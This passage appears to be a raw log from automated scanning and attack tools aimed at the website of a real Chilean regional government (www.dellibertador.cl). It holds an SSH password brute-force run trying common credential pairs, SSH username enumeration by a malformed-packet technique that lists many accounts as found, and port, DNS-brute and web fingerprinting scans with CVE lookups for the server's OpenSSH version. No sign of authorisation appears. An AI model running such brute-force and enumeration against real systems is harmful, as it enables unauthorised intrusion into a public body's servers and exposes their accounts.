2329NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:iloveyou
2330NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:iloveyou
2331NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:princess
2332NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:princess
2333NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:princess
2334NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:princess
2335NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:princess
2336NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:princess
2337NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:princess
2338NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:princess
2339NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:princess
2340NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:princess
2341NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:12345678
2342NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:12345678
2343NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:12345678
2344NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:12345678
2345NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:12345678
2346NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:12345678
2347NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:12345678
2348NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:12345678
2349NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:12345678
2350NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:12345678
2351NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:1234567
2352NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:1234567
2353NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:1234567
2354NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:1234567
2355NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:1234567
2356NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:1234567
2357NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:1234567
2358NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:1234567
2359NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:1234567
2360NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:1234567
2361NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:abc123
2362NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:abc123
2363NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:abc123
2364NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:abc123
2365NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:abc123
2366NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:abc123
2367NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:abc123
2368NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:abc123
2369NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:abc123
2370NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:abc123
2371NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:nicole
2372NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:nicole
2373NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:nicole
2374NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:nicole
2375NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:nicole
2376NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:nicole
2377NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:nicole
2378NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:nicole
2379NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:nicole
2380NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:nicole
2381NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:daniel
2382NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:daniel
2383NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:daniel
2384NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:daniel
2385NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:daniel
2386NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:daniel
2387NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:daniel
2388NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:daniel
2389NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:daniel
2390NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:daniel
2391NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:monkey
2392NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:monkey
2393NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:monkey
2394NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:monkey
2395NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:monkey
2396NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:monkey
2397NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:monkey
2398NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:monkey
2399NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:monkey
2400NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:monkey
2401NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:babygirl
2402NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:babygirl
2403NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:babygirl
2404NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:babygirl
2405NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:babygirl
2406NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:babygirl
2407NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:babygirl
2408NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:babygirl
2409NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:babygirl
2410NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:babygirl
2411NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:qwerty
2412NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:qwerty
2413NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:qwerty
2414NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:qwerty
2415NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:qwerty
2416NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:qwerty
2417NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:qwerty
2418NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:qwerty
2419NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:qwerty
2420NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:qwerty
2421NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:lovely
2422NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:lovely
2423NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:lovely
2424NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:lovely
2425NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:lovely
2426NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:lovely
2427NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:lovely
2428NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:lovely
2429NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:lovely
2430NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:lovely
2431NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:654321
2432NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:654321
2433NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:654321
2434NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:654321
2435NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:654321
2436NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: netadmin:654321
2437NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: guest:654321
2438NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: user:654321
2439NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: web:654321
2440NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: test:654321
2441NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: root:michael
2442NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: admin:michael
2443NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: administrator:michael
2444NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: webadmin:michael
2445NSE: [ssh-brute 200.54.230.247:22] Trying username/password pair: sysadmin:michael
2446Completed NSE at 16:55, 90.20s elapsed
2447Initiating NSE at 16:55
2448Completed NSE at 16:55, 0.05s elapsed
2449Nmap scan report for www.dellibertador.cl (200.54.230.247)
2450Host is up (0.44s latency).
2451rDNS record for 200.54.230.247: plesk.tdata.cloud
2452
2453PORT STATE SERVICE VERSION
245422/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2455| ssh-auth-methods:
2456| Supported authentication methods:
2457| publickey
2458| gssapi-keyex
2459| gssapi-with-mic
2460|_ password
2461| ssh-hostkey:
2462| 2048 a2:d5:9a:d1:54:5e:c6:d6:73:ff:76:5b:77:30:88:90 (RSA)
2463| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCWAGt2obsIktV/nSSC+7JU68HYW/a7aazqq8UizSYVHRN2dg6fH0H7EyCbA3BPg0WovnDLi8l9NtSRIhzLLQh0VYB15bcaTTcXRvpq6O6+S1wv22XMcusJV4applURE82D+9/kK+nAXaTOvCRT9TvAhxs8Y8MAlxX6Q0/IgVseTL3oGB7UiYbguMVH5H7qeU83mbhxF9FoVLrzwYuUe38aRRU1T6oIwqlIJe3J4EfLK6shhlLKgyfv3TtZdYcm1toh5LlrDvUP+88ZlDaOAUWeGPSvSakYELawXYPV85XlzrLqUelQLza2vgnWkuqpws0wlYN8SavmUnqmkZBKzxWt
2464| 256 6a:1d:91:55:77:cb:45:e2:a4:90:53:35:d4:d0:36:7f (ECDSA)
2465| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMfXBn+T2ScrldevunD4BR5kWRsh3le7Je24Mc5x5E+cTyJgvXznoqMbrqUhKvUnXikEXHeJZu7V6FTQrt6NjE=
2466| 256 68:99:17:75:71:2b:70:19:1b:0a:b3:45:38:da:71:63 (ED25519)
2467|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB+RYN7BnRzhrP6Op8RM5j6PeUmSlKG2eCWQhg/G3myf
2468|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
2469|_ssh-run: Failed to specify credentials and command to run.
2470| vulners:
2471| cpe:/a:openbsd:openssh:7.4:
2472| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
2473|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
2474Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2475Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2476No exact OS matches for host (test conditions non-ideal).
2477Uptime guess: 2.025 days (since Tue Mar 10 16:19:46 2020)
2478Network Distance: 19 hops
2479TCP Sequence Prediction: Difficulty=261 (Good luck!)
2480IP ID Sequence Generation: All zeros
2481
2482TRACEROUTE (using port 22/tcp)
2483HOP RTT ADDRESS
24841 227.85 ms 10.202.5.1
24852 341.72 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
24863 341.77 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
24874 341.79 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
24885 341.81 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
24896 341.87 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
24907 341.86 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
24918 341.85 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
24929 ...
249310 341.97 ms 94.142.127.234
249411 340.40 ms 176.52.248.54
249512 376.81 ms 5.53.7.171
249613 ... 14
249715 491.04 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
249816 491.00 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
249917 ... 18
250019 491.00 ms plesk.tdata.cloud (200.54.230.247)
2501
2502NSE: Script Post-scanning.
2503Initiating NSE at 16:55
2504Completed NSE at 16:55, 0.00s elapsed
2505Initiating NSE at 16:55
2506Completed NSE at 16:55, 0.00s elapsed
2507#####################################################################################################################################
2508USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2509RHOSTS => www.dellibertador.cl
2510RHOST => www.dellibertador.cl
2511[*] 200.54.230.247:22 - SSH - Using malformed packet technique
2512[*] 200.54.230.247:22 - SSH - Starting scan
2513[+] 200.54.230.247:22 - SSH - User 'admin' found
2514[+] 200.54.230.247:22 - SSH - User 'administrator' found
2515[+] 200.54.230.247:22 - SSH - User 'anonymous' found
2516[+] 200.54.230.247:22 - SSH - User 'backup' found
2517[+] 200.54.230.247:22 - SSH - User 'bee' found
2518[+] 200.54.230.247:22 - SSH - User 'ftp' found
2519[+] 200.54.230.247:22 - SSH - User 'guest' found
2520[+] 200.54.230.247:22 - SSH - User 'GUEST' found
2521[+] 200.54.230.247:22 - SSH - User 'info' found
2522[+] 200.54.230.247:22 - SSH - User 'mail' found
2523[+] 200.54.230.247:22 - SSH - User 'mailadmin' found
2524[+] 200.54.230.247:22 - SSH - User 'msfadmin' found
2525[+] 200.54.230.247:22 - SSH - User 'mysql' found
2526[+] 200.54.230.247:22 - SSH - User 'nobody' found
2527[+] 200.54.230.247:22 - SSH - User 'oracle' found
2528[+] 200.54.230.247:22 - SSH - User 'owaspbwa' found
2529[+] 200.54.230.247:22 - SSH - User 'postfix' found
2530[+] 200.54.230.247:22 - SSH - User 'postgres' found
2531[+] 200.54.230.247:22 - SSH - User 'private' found
2532[+] 200.54.230.247:22 - SSH - User 'proftpd' found
2533[+] 200.54.230.247:22 - SSH - User 'public' found
2534[+] 200.54.230.247:22 - SSH - User 'root' found
2535[+] 200.54.230.247:22 - SSH - User 'superadmin' found
2536[+] 200.54.230.247:22 - SSH - User 'support' found
2537[+] 200.54.230.247:22 - SSH - User 'sys' found
2538[+] 200.54.230.247:22 - SSH - User 'system' found
2539[+] 200.54.230.247:22 - SSH - User 'systemadmin' found
2540[+] 200.54.230.247:22 - SSH - User 'systemadministrator' found
2541[+] 200.54.230.247:22 - SSH - User 'test' found
2542[+] 200.54.230.247:22 - SSH - User 'tomcat' found
2543[+] 200.54.230.247:22 - SSH - User 'user' found
2544[+] 200.54.230.247:22 - SSH - User 'webmaster' found
2545[+] 200.54.230.247:22 - SSH - User 'www-data' found
2546[+] 200.54.230.247:22 - SSH - User 'Fortimanager_Access' found
2547[*] Scanned 1 of 1 hosts (100% complete)
2548[*] Auxiliary module execution completed
2549#####################################################################################################################################
2550Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:58 EDT
2551NSE: Loaded 55 scripts for scanning.
2552NSE: Script Pre-scanning.
2553Initiating NSE at 16:58
2554Completed NSE at 16:58, 0.00s elapsed
2555Initiating NSE at 16:58
2556Completed NSE at 16:58, 0.00s elapsed
2557Initiating Parallel DNS resolution of 1 host. at 16:58
2558Completed Parallel DNS resolution of 1 host. at 16:58, 0.02s elapsed
2559Initiating SYN Stealth Scan at 16:58
2560Scanning www.dellibertador.cl (200.54.230.247) [1 port]
2561Discovered open port 25/tcp on 200.54.230.247
2562Completed SYN Stealth Scan at 16:58, 0.38s elapsed (1 total ports)
2563Initiating Service scan at 16:58
2564Scanning 1 service on www.dellibertador.cl (200.54.230.247)
2565Completed Service scan at 16:58, 0.73s elapsed (1 service on 1 host)
2566Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
2567Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
2568Initiating Traceroute at 16:58
2569Completed Traceroute at 16:58, 3.31s elapsed
2570Initiating Parallel DNS resolution of 14 hosts. at 16:58
2571Completed Parallel DNS resolution of 14 hosts. at 16:58, 1.19s elapsed
2572NSE: Script scanning 200.54.230.247.
2573Initiating NSE at 16:58
2574NSE Timing: About 71.62% done; ETC: 17:00 (0:00:30 remaining)
2575Completed NSE at 16:59, 90.88s elapsed
2576Initiating NSE at 16:59
2577Completed NSE at 16:59, 0.05s elapsed
2578Nmap scan report for www.dellibertador.cl (200.54.230.247)
2579Host is up (0.36s latency).
2580rDNS record for 200.54.230.247: plesk.tdata.cloud
2581
2582PORT STATE SERVICE VERSION
258325/tcp open smtp Postfix smtpd
2584|_smtp-commands: plesk.tdata.cloud, PIPELINING, SIZE 42188800, ETRN, STARTTLS, AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
2585| smtp-enum-users:
2586|_ Method RCPT returned a unhandled status code.
2587|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
2588| smtp-vuln-cve2010-4344:
2589|_ The SMTP server is not Exim: NOT VULNERABLE
2590Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2591Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2592No exact OS matches for host (test conditions non-ideal).
2593Uptime guess: 2.028 days (since Tue Mar 10 16:19:46 2020)
2594Network Distance: 19 hops
2595TCP Sequence Prediction: Difficulty=264 (Good luck!)
2596IP ID Sequence Generation: All zeros
2597Service Info: Host: plesk.tdata.cloud
2598
2599TRACEROUTE (using port 25/tcp)
2600HOP RTT ADDRESS
26011 171.11 ms 10.202.5.1
26022 286.87 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
26033 286.91 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
26044 286.93 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
26055 286.95 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
26066 286.98 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
26077 287.01 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
26088 286.99 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
26099 287.04 ms 176.52.248.119
261010 ...
261111 345.30 ms 176.52.248.54
261212 347.04 ms 176.52.253.159
261313 ...
261414 465.33 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
261515 465.34 ms pe24tolp01.Vl466.lflo.internacional.ce.nap.movistar.cl (186.148.62.118)
261616 ... 18
261719 465.31 ms plesk.tdata.cloud (200.54.230.247)
2618
2619NSE: Script Post-scanning.
2620Initiating NSE at 16:59
2621Completed NSE at 16:59, 0.00s elapsed
2622Initiating NSE at 16:59
2623Completed NSE at 16:59, 0.00s elapsed
2624####################################################################################################################################
2625Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:07 EDT
2626NSE: Loaded 64 scripts for scanning.
2627NSE: Script Pre-scanning.
2628Initiating NSE at 17:07
2629Completed NSE at 17:07, 0.00s elapsed
2630Initiating NSE at 17:07
2631Completed NSE at 17:07, 0.00s elapsed
2632Initiating Parallel DNS resolution of 1 host. at 17:07
2633Completed Parallel DNS resolution of 1 host. at 17:07, 0.03s elapsed
2634Initiating SYN Stealth Scan at 17:07
2635Scanning www.dellibertador.cl (200.54.230.247) [1 port]
2636Discovered open port 53/tcp on 200.54.230.247
2637Completed SYN Stealth Scan at 17:07, 0.42s elapsed (1 total ports)
2638Initiating Service scan at 17:07
2639Scanning 1 service on www.dellibertador.cl (200.54.230.247)
2640Completed Service scan at 17:08, 17.00s elapsed (1 service on 1 host)
2641Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
2642Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
2643Initiating Traceroute at 17:08
2644Completed Traceroute at 17:08, 3.30s elapsed
2645Initiating Parallel DNS resolution of 13 hosts. at 17:08
2646Completed Parallel DNS resolution of 13 hosts. at 17:08, 1.36s elapsed
2647NSE: Script scanning 200.54.230.247.
2648Initiating NSE at 17:08
2649Completed NSE at 17:08, 14.13s elapsed
2650Initiating NSE at 17:08
2651Completed NSE at 17:08, 0.00s elapsed
2652Nmap scan report for www.dellibertador.cl (200.54.230.247)
2653Host is up (0.48s latency).
2654rDNS record for 200.54.230.247: plesk.tdata.cloud
2655
2656PORT STATE SERVICE VERSION
265753/tcp open domain (unknown banner: none)
2658|_dns-fuzz: Server didn't response to our probe, can't fuzz
2659| dns-nsec-enum:
2660|_ No NSEC records found
2661| dns-nsec3-enum:
2662|_ DNSSEC NSEC3 not supported
2663| dns-nsid:
2664|_ bind.version: none
2665| fingerprint-strings:
2666| DNSVersionBindReqTCP:
2667| version
2668| bind
2669|_ none
26701 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
2671SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=5E6AA4B1%P=x86_64-pc-linux-gnu%r(DNSV
2672SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
2673SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
2674SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
2675Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2676Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2677No exact OS matches for host (test conditions non-ideal).
2678Uptime guess: 2.034 days (since Tue Mar 10 16:19:45 2020)
2679Network Distance: 19 hops
2680TCP Sequence Prediction: Difficulty=244 (Good luck!)
2681IP ID Sequence Generation: All zeros
2682
2683Host script results:
2684| dns-blacklist:
2685| SPAM
2686|_ l2.apews.org - SPAM
2687| dns-brute:
2688| DNS Brute-force hostnames:
2689| ns.dellibertador.cl - 200.54.230.247
2690| mail.dellibertador.cl - 200.54.230.247
2691| www.dellibertador.cl - 200.54.230.247
2692|_ ftp.dellibertador.cl - 200.54.230.247
2693
2694TRACEROUTE (using port 53/tcp)
2695HOP RTT ADDRESS
26961 172.08 ms 10.202.5.1
26972 285.96 ms unn-84-17-52-126.cdn77.com (84.17.52.126)
26983 286.00 ms hu0-1-0-2.rcr51.b021037-0.zrh02.atlas.cogentco.com (149.11.89.129)
26994 286.02 ms be3592.ccr52.zrh02.atlas.cogentco.com (154.54.37.150)
27005 286.04 ms be3073.ccr22.muc03.atlas.cogentco.com (130.117.0.62)
27016 286.07 ms be2960.ccr42.fra03.atlas.cogentco.com (154.54.36.253)
27027 286.09 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
27038 286.09 ms telefonica.fra03.atlas.cogentco.com (130.117.14.118)
27049 286.13 ms 176.52.248.119
270510 ...
270611 336.22 ms 94.142.125.164
270712 428.27 ms 5.53.0.233
270813 ...
270914 584.60 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
271015 584.56 ms nap96lflo02.lo0.red.lflo.nap.movistar.cl (200.91.0.6)
271116 ... 18
271219 584.58 ms plesk.tdata.cloud (200.54.230.247)
2713
2714NSE: Script Post-scanning.
2715Initiating NSE at 17:08
2716Completed NSE at 17:08, 0.00s elapsed
2717Initiating NSE at 17:08
2718Completed NSE at 17:08, 0.00s elapsed
2719Read data files from: /usr/bin/../share/nmap
2720OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2721Nmap done: 1 IP address (1 host up) scanned in 48.08 seconds
2722 Raw packets sent: 100 (8.012KB) | Rcvd: 67 (4.904KB)
2723 + -- --=[Port 67 closed... skipping.
2724 + -- --=[Port 68 closed... skipping.
2725 + -- --=[Port 69 closed... skipping.
2726 + -- --=[Port 79 closed... skipping.
2727 + -- --=[Port 80 opened... running tests...
2728====================================================================================•x[2020-03-12](17:08)x•
2729 CHECKING HTTP HEADERS AND METHODS
2730====================================================================================•x[2020-03-12](17:08)x•
2731HTTP/1.1 301 Moved Permanently
2732Server: nginx
2733Date: Thu, 12 Mar 2020 21:08:36 GMT
2734Content-Type: text/html
2735Content-Length: 162
2736Connection: keep-alive
2737Location: https://www.dellibertador.cl/
2738####################################################################################################################################
2739http://www.dellibertador.cl [301 Moved Permanently] Country[CHILE][CL], HTTPServer[nginx], IP[200.54.230.247], RedirectLocation[https://www.dellibertador.cl/], Title[301 Moved Permanently], nginx
2740https://www.dellibertador.cl/ [200 OK] Country[CHILE][CL], HTTPServer[nginx], IP[200.54.230.247], Meta-Refresh-Redirect[https://www.dellibertador.cl/d3/], Plesk[Lin], Title[Gore O'Higgins], UncommonHeaders[x-accel-version], X-Powered-By[PleskLin], nginx
2741https://www.dellibertador.cl/d3/ [200 OK] Bootstrap, Cookies[f4528e99b1258780d7d15999091df8c3], Country[CHILE][CL], HTML5, HTTPServer[nginx], HttpOnly[f4528e99b1258780d7d15999091df8c3], IP[200.54.230.247], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PHP[7.3.15,], Plesk[Lin], Script[application/json,text/javascript], Title[Inicio], UncommonHeaders[x-content-type-options], X-Powered-By[PHP/7.3.15, PleskLin], X-UA-Compatible[IE=edge], nginx
2742#######################################################################################################################################
2743Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:14 EDT
2744NSE: Loaded 161 scripts for scanning.
2745NSE: Script Pre-scanning.
2746Initiating NSE at 17:14
2747Completed NSE at 17:14, 0.00s elapsed
2748Initiating NSE at 17:14
2749Completed NSE at 17:14, 0.00s elapsed
2750Initiating Parallel DNS resolution of 1 host. at 17:14
2751Completed Parallel DNS resolution of 1 host. at 17:14, 0.02s elapsed
2752Initiating SYN Stealth Scan at 17:14
2753Scanning www.dellibertador.cl (200.54.230.247) [1 port]
2754Discovered open port 80/tcp on 200.54.230.247
2755Completed SYN Stealth Scan at 17:14, 0.48s elapsed (1 total ports)
2756Initiating Service scan at 17:14
2757Scanning 1 service on www.dellibertador.cl (200.54.230.247)
2758Completed Service scan at 17:14, 7.17s elapsed (1 service on 1 host)
2759Initiating OS detection (try #1) against www.dellibertador.cl (200.54.230.247)
2760Retrying OS detection (try #2) against www.dellibertador.cl (200.54.230.247)
2761Initiating Traceroute at 17:15
2762Completed Traceroute at 17:15, 3.30s elapsed
2763Initiating Parallel DNS resolution of 14 hosts. at 17:15
2764Completed Parallel DNS resolution of 14 hosts. at 17:15, 1.16s elapsed
2765NSE: Script scanning 200.54.230.247.
2766Initiating NSE at 17:15
2767Completed NSE at 17:16, 90.35s elapsed
2768Initiating NSE at 17:16
2769Completed NSE at 17:16, 1.75s elapsed
2770Nmap scan report for www.dellibertador.cl (200.54.230.247)
2771Host is up (0.46s latency).
2772rDNS record for 200.54.230.247: plesk.tdata.cloud
2773
2774PORT STATE SERVICE VERSION
277580/tcp open http nginx
2776| http-brute:
2777|_ Path "/" does not require authentication
2778|_http-chrono: Request times for /; avg: 1271.25ms; min: 1148.10ms; max: 1506.29ms
2779|_http-csrf: Couldn't find any CSRF vulnerabilities.
2780|_http-date: Thu, 12 Mar 2020 21:15:07 GMT; -6s from local time.
2781|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
2782|_http-dombased-xss: Couldn't find any DOM based XSS.
2783|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
2784|_http-errors: Couldn't find any error pages.
2785|_http-feed: Couldn't find any feeds.
2786|_http-fetch: Please enter the complete path of the directory to save data in.
2787| http-headers:
2788| Server: nginx
2789| Date: Thu, 12 Mar 2020 21:15:17 GMT
2790| Content-Type: text/html
2791| Content-Length: 162
2792| Connection: close
2793| Location: https://www.dellibertador.cl/
2794|
2795|_ (Request type: GET)
2796|_http-jsonp-detection: Couldn't find any JSONP endpoints.
2797| http-methods:
2798|_ Supported Methods: GET HEAD POST OPTIONS
